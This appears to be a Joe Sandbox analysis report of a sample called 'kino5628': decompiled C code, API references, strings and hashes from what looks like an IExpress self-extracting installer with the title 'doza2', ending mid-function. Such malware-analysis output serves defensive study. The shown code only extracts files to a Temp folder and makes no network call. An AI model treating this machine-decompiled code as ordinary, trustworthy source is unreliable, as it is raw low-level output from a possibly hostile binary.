Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 95b4a3ea798e35d949406da1cfbc936f156ae989557e523c431ece41fd725a39
Instruction ID: a06335918d3890af022b71d07e690d042b2a6fdce178f0e0d04467393bd20efa
Opcode Fuzzy Hash: 95b4a3ea798e35d949406da1cfbc936f156ae989557e523c431ece41fd725a39
Instruction Fuzzy Hash: BDD01232000188BBDB042BF1EC4CA593F28FB49B12F454004F71F8A020CB326451CB53

Uniqueness

Uniqueness Score: -1.00%

Function 008E3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E008E3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E008E43D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "doza2");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x8e9a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x8e91e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E008E44B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x8e91e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x8e91e5 - 3;
						if(_t49 - 0x8e91e5 < 3) {
							goto L32;
						}
						_t24 =  *0x8e91e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x8e91e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E008E658A(0x8e91e4, 0x104, 0x8e1140);
								_t27 = E008E58C8(0x8e91e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x8e91e4 - 0x5c;
									if( *0x8e91e4 != 0x5c) {
										L30:
										_t30 = E008E597D(0x8e91e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x8e91e5 - 0x5c;
									if( *0x8e91e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E008E44B9(_t64, 0x54a, 0x8e91e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x8e91e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x8e91e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x8e91e4 - 0x5c;
						if( *0x8e91e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x8e9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x8e9a3c, 0x3e8, 0x8e8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E008E4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x8e87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E008E44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x008e321b
0x008e321e
0x008e3221
0x008e343c
0x008e343e
0x008e343f
0x008e3445
0x008e3447
0x00000000
0x008e3447
0x008e3229
0x008e322a
0x008e322f
0x008e33ec
0x008e33f7
0x008e3410
0x008e3416
0x008e341d
0x008e342d
0x008e342d
0x008e3438
0x00000000
0x008e3438
0x008e3237
0x008e3243
0x008e3243
0x008e3246
0x008e32ee
0x008e32f4
0x008e32f6
0x008e33d4
0x008e33d6
0x008e33db
0x008e33dc
0x008e33de
0x008e33df
0x008e3370
0x008e3372
0x00000000
0x008e3372
0x008e32fc
0x008e3301
0x008e3301
0x008e3303
0x008e3304
0x008e3304
0x008e330a
0x008e330d
0x00000000
0x00000000
0x008e3313
0x008e3318
0x008e331a
0x008e3331
0x008e3332
0x008e333a
0x008e333d
0x008e337c
0x008e3388
0x008e338f
0x008e3394
0x008e3396
0x008e33a4
0x008e33ab
0x008e33b6
0x008e33be
0x008e33c3
0x008e33c5
0x008e3435
0x008e3437
0x008e3437
0x00000000
0x008e3437
0x008e33c7
0x008e33c9
0x008e33cc
0x00000000
0x008e33cc
0x008e33ad
0x008e33b4
0x00000000
0x00000000
0x00000000
0x008e33b4
0x008e3398
0x008e3399
0x008e339b
0x008e339c
0x008e339d
0x00000000
0x008e339d
0x008e334c
0x008e3351
0x008e3354
0x00000000
0x00000000
0x008e335c
0x008e3362
0x008e3364
0x00000000
0x00000000
0x008e3366
0x008e3367
0x008e3369
0x008e336a
0x008e336b
0x00000000
0x008e336b
0x008e331c
0x008e3323
0x00000000
0x00000000
0x008e3329
0x008e332b
0x00000000
0x00000000
0x00000000
0x008e332b
0x008e324c
0x008e324c
0x008e324f
0x008e32c8
0x008e32ce
0x00000000
0x008e32ce
0x008e3251
0x008e3256
0x00000000
0x00000000
0x008e3271
0x008e3277
0x008e3279
0x008e3298
0x008e329d
0x008e329f
0x00000000
0x00000000
0x008e32b0
0x008e32b6
0x008e32b8
0x00000000
0x00000000
0x008e32be
0x008e3280
0x008e3289
0x008e328e
0x00000000
0x008e328e
0x008e327b
0x00000000
0x008e327b
0x00000000

APIs

LoadStringA.USER32(000003E8,008E8598,00000200), ref: 008E3271
GetDesktopWindow.USER32 ref: 008E33E2
SetWindowTextA.USER32(?,doza2), ref: 008E33F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 008E3410
GetDlgItem.USER32(?,00000836), ref: 008E3426
EnableWindow.USER32(00000000), ref: 008E342D
EndDialog.USER32(?,00000000), ref: 008E343F

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E32E2, 008E32E7, 008E3331, 008E3344, 008E335B, 008E336A
doza2, xrefs: 008E33F1

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$doza2
API String ID: 2418873061-44923337
Opcode ID: 280e52b0689db54fed3e047b3d5f5257bf9091f02011180c0c4ecb693c2d7d19
Instruction ID: 588e9f06a8b6be144fae1ad5f6d90d8fcf2c572760eb81e5c56ecaa1e55d3399
Opcode Fuzzy Hash: 280e52b0689db54fed3e047b3d5f5257bf9091f02011180c0c4ecb693c2d7d19
Instruction Fuzzy Hash: 855108303412C0B6E7255B3B5CCCF7F3959FB57B59F104029F646DB2C1DAA49E0192A6

Uniqueness

Uniqueness Score: -1.00%

Function 008E2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E008E2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x8e8004; // 0xaf179a30
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x8e9a3c = __ecx;
				memset(0x8e9140, 0, 0x8fc);
				memset(0x8e8a20, 0, 0x32c);
				memset(0x8e88c0, 0, 0x104);
				 *0x8e93ec = 1;
				_t20 = E008E468F("TITLE", 0x8e9154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x8e858c = _t27;
					SetEvent(_t27);
					_t64 = 0x8e9a34;
					if(E008E468F("EXTRACTOPT", 0x8e9a34, 4) != 0) {
						if(( *0x8e9a34 & 0x000000c0) == 0) {
							L12:
							 *0x8e9120 =  *0x8e9120 & _t65;
							if(E008E5C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x8e8a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x8e8184 != 0) {
										__imp__#17();
									}
									if( *0x8e8a24 == 0) {
										_t57 = _t65;
										if(E008E36EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x8e9a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x8e9a34 & 0x00000100) == 0 || ( *0x8e8a38 & 0x00000001) != 0 || E008E18A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E008E6517(_t57, 0x7d6, _t34, E008E19E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E008E2390(0x8e8a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E008E44B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E008E468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x8e8588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x8e9a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E008E44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E008E44B9(0, 0x54b, "doza2", 0, 0x10, 0);
										L11:
										CloseHandle( *0x8e8588);
										 *0x8e9124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E008E44B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x8e9124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E008E6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x008e2cb5
0x008e2cbc
0x008e2cc7
0x008e2cc9
0x008e2cd1
0x008e2cd3
0x008e2cd9
0x008e2ce9
0x008e2cf9
0x008e2d0e
0x008e2d15
0x008e2d1c
0x008e2ef3
0x00000000
0x008e2d2d
0x008e2d34
0x008e2d3b
0x008e2d40
0x008e2d48
0x008e2d59
0x008e2d84
0x008e2e1f
0x008e2e1f
0x008e2e2e
0x008e2e41
0x008e2e5a
0x008e2e62
0x008e2e6c
0x008e2e6c
0x008e2e75
0x008e2e77
0x008e2e77
0x008e2e84
0x008e2e8b
0x008e2e94
0x00000000
0x008e2e96
0x008e2e96
0x008e2e9e
0x008e2ea2
0x008e2eba
0x00000000
0x008e2ece
0x008e2ede
0x008e2eed
0x00000000
0x00000000
0x00000000
0x00000000
0x008e2eed
0x008e2eef
0x008e2eef
0x008e2eef
0x008e2eef
0x008e2ea2
0x008e2e86
0x008e2e88
0x008e2e88
0x008e2e43
0x008e2e48
0x00000000
0x008e2e48
0x008e2e30
0x008e2e30
0x008e2ef8
0x008e2f01
0x00000000
0x008e2f01
0x008e2d8a
0x008e2d8f
0x008e2da1
0x00000000
0x008e2da3
0x008e2dae
0x008e2db4
0x008e2dbb
0x00000000
0x008e2dca
0x008e2dd3
0x008e2df5
0x008e2e02
0x00000000
0x00000000
0x00000000
0x00000000
0x008e2dd5
0x008e2dde
0x008e2de3
0x008e2e04
0x008e2e0a
0x008e2e10
0x00000000
0x008e2e10
0x008e2dd3
0x008e2dbb
0x008e2da1
0x008e2d5b
0x008e2d5b
0x008e2d5d
0x008e2d69
0x008e2d6e
0x008e2f06
0x008e2f06
0x008e2f06
0x008e2d59
0x008e2f18

APIs

memset.MSVCRT ref: 008E2CD9
memset.MSVCRT ref: 008E2CE9
memset.MSVCRT ref: 008E2CF9

Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46A0
Part of subcall function 008E468F: SizeofResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46A9
Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46C3
Part of subcall function 008E468F: LoadResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46CC
Part of subcall function 008E468F: LockResource.KERNEL32(00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46D3
Part of subcall function 008E468F: memcpy_s.MSVCRT ref: 008E46E5
Part of subcall function 008E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E2D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 008E2D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 008E2DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 008E2DBD
CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 008E2E0A

Part of subcall function 008E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008E4518
Part of subcall function 008E44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 008E4554

Strings

EXTRACTOPT, xrefs: 008E2D4D
doza2, xrefs: 008E2D04, 008E2DD9, 008E2DF0
VERCHECK, xrefs: 008E2E54
INSTANCECHECK, xrefs: 008E2D95
TITLE, xrefs: 008E2D09

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
API String ID: 1002816675-859929227
Opcode ID: 763124ba788e04d8582a7ee1d70e07fa728762aa3f059d72543d7515b76f0c8f
Instruction ID: 7992e6d03373c00dd361fa7a0e68a98637d8f3d4f8f1b6af9523a5049121558b
Opcode Fuzzy Hash: 763124ba788e04d8582a7ee1d70e07fa728762aa3f059d72543d7515b76f0c8f
Instruction Fuzzy Hash: 0951E9703403D6A6E724AB678C8AB7E369CFB47714F004039FA85D92D2DFB88C41D626

Uniqueness

Uniqueness Score: -1.00%

Function 008E34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E008E34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x8e91d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x8e8584 = _t35;
					E008E43D0(_t35, GetDesktopWindow());
					__eflags =  *0x8e8184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "doza2");
					_t17 = CreateThread(0, 0, E008E4FE0, 0, 0, 0x8e8798);
					 *0x8e879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E008E44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x8e858c);
					_t38 =  *0x8e8584; // 0x0
					_t25 = E008E44B9(_t38, 0x4b2, 0x8e1140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x8e91d8 = 1;
						SetEvent( *0x8e858c);
						_t39 =  *0x8e879c; // 0x0
						E008E3680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x8e858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x8e879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x008e34fb
0x008e34fe
0x008e3665
0x008e3666
0x008e3666
0x008e3668
0x008e366e
0x008e366e
0x008e3671
0x008e3671
0x008e3677
0x00000000
0x008e3677
0x008e3504
0x008e3506
0x008e3507
0x008e350c
0x008e365b
0x008e365f
0x00000000
0x00000000
0x00000000
0x008e3661
0x008e3512
0x008e3515
0x008e35be
0x008e35c1
0x008e35d1
0x008e35d8
0x008e35de
0x008e35f8
0x008e3617
0x008e3617
0x008e3623
0x008e3637
0x008e363d
0x008e3642
0x008e3644
0x00000000
0x008e3646
0x008e3652
0x008e3657
0x008e3658
0x00000000
0x008e3658
0x008e3644
0x008e351b
0x008e351d
0x008e354f
0x008e3553
0x00000000
0x00000000
0x008e355f
0x008e3565
0x008e357c
0x008e3581
0x008e3584
0x008e359b
0x008e35a1
0x008e35a7
0x008e35ad
0x008e35b3
0x008e35b8
0x00000000
0x008e35b8
0x008e3586
0x008e3588
0x00000000
0x00000000
0x008e3590
0x00000000
0x008e3590
0x008e3524
0x008e3535
0x008e3541
0x00000000
0x008e3549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 008E3535
EndDialog.USER32(?,?), ref: 008E3541
ResetEvent.KERNEL32 ref: 008E355F
SetEvent.KERNEL32(008E1140,00000000,00000020,00000004), ref: 008E3590
GetDesktopWindow.USER32 ref: 008E35C7
GetDlgItem.USER32(?,0000083B), ref: 008E35F1
SendMessageA.USER32(00000000), ref: 008E35F8
GetDlgItem.USER32(?,0000083B), ref: 008E3610
SendMessageA.USER32(00000000), ref: 008E3617
SetWindowTextA.USER32(?,doza2), ref: 008E3623
CreateThread.KERNEL32 ref: 008E3637
EndDialog.USER32(?,00000000), ref: 008E3671

Strings

doza2, xrefs: 008E361D

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: doza2
API String ID: 2406144884-612509477
Opcode ID: 291c562f48e1ba0cdad1827c60a70e8fb85500595b6952ba710f76216441aa71
Instruction ID: 6a6bf46afae59f2a58bbf15fdf8caeda26e4f5205c793f1177de9f876708cd34
Opcode Fuzzy Hash: 291c562f48e1ba0cdad1827c60a70e8fb85500595b6952ba710f76216441aa71
Instruction Fuzzy Hash: CA319E712402C0BBD7241F36ACCDE2A3A69F797F01F104529F616DA2B0CA759E00EA55

Uniqueness

Uniqueness Score: -1.00%

Function 008E4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E008E4224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E008E44B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x8e88c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x8e87a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x8e8598;
					_v36 = 1;
					_v32 = E008E4200;
					_v28 = 0x8e88c0;
					 *0x8ea288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x8ea288(_t32, 0x8e88c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x8e88c0 != 0) {
							E008E1680(0x8e87a0, 0x104, 0x8e88c0);
						}
						 *0x8ea288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x8e87a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x8e88c0);
					_t61 = 0x8e88c0;
					_t4 =  &(_t61[1]); // 0x8e88c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x8e88c0; // 0x11d1181
					_t44 = CharPrevA(0x8e88c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x8e88c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x008e4234
0x008e423c
0x008e4240
0x008e43b2
0x008e43b7
0x008e43c0
0x00000000
0x008e43c5
0x008e424c
0x008e4252
0x008e4257
0x008e43a4
0x008e43a5
0x008e43ab
0x00000000
0x008e43ab
0x008e4263
0x008e4269
0x008e426e
0x00000000
0x00000000
0x008e427a
0x008e4280
0x008e4285
0x00000000
0x00000000
0x008e428d
0x008e4293
0x008e42e6
0x008e42e9
0x008e42ef
0x008e42f4
0x008e42f7
0x008e4300
0x008e4307
0x008e430e
0x008e4315
0x008e431c
0x008e4322
0x008e4326
0x008e432d
0x008e432d
0x008e432f
0x008e4334
0x008e4343
0x008e4349
0x008e434d
0x008e4354
0x008e4354
0x008e435d
0x008e436e
0x008e436e
0x008e437d
0x008e4383
0x008e4387
0x008e438e
0x008e438e
0x008e4387
0x008e4391
0x008e4399
0x00000000
0x008e4295
0x008e429f
0x008e42a5
0x008e42aa
0x008e42aa
0x008e42ad
0x008e42ad
0x008e42af
0x008e42b0
0x008e42b6
0x008e42c2
0x008e42c8
0x008e42ce
0x008e42e4
0x008e42e4
0x00000000
0x008e42ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 008E4236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 008E424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 008E4263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 008E427A
GetTempPathA.KERNEL32(00000104,008E88C0,?,00000001), ref: 008E429F
CharPrevA.USER32(008E88C0,011D1181,?,00000001), ref: 008E42C2
CharPrevA.USER32(008E88C0,00000000,?,00000001), ref: 008E42D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 008E4391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 008E43A5

Strings

SHBrowseForFolder, xrefs: 008E4246
SHGetPathFromIDList, xrefs: 008E4274
SHELL32.DLL, xrefs: 008E422F

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: c860fd2e28c2f1364c2e0b61fbbd126684b2d19fe02608461d4b114ec3a11422
Instruction ID: 47d348545007afb47d17f662c11d629481aa669b9e04656c0f171007d65e75ae
Opcode Fuzzy Hash: c860fd2e28c2f1364c2e0b61fbbd126684b2d19fe02608461d4b114ec3a11422
Instruction Fuzzy Hash: 8B411274A002D4EFD711AFA6DCC8A6E7BB4FB46744F040069EA09EB351CB748C05C762

Uniqueness

Uniqueness Score: -1.00%

Function 008E2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E008E2773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x8e8004; // 0xaf179a30
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
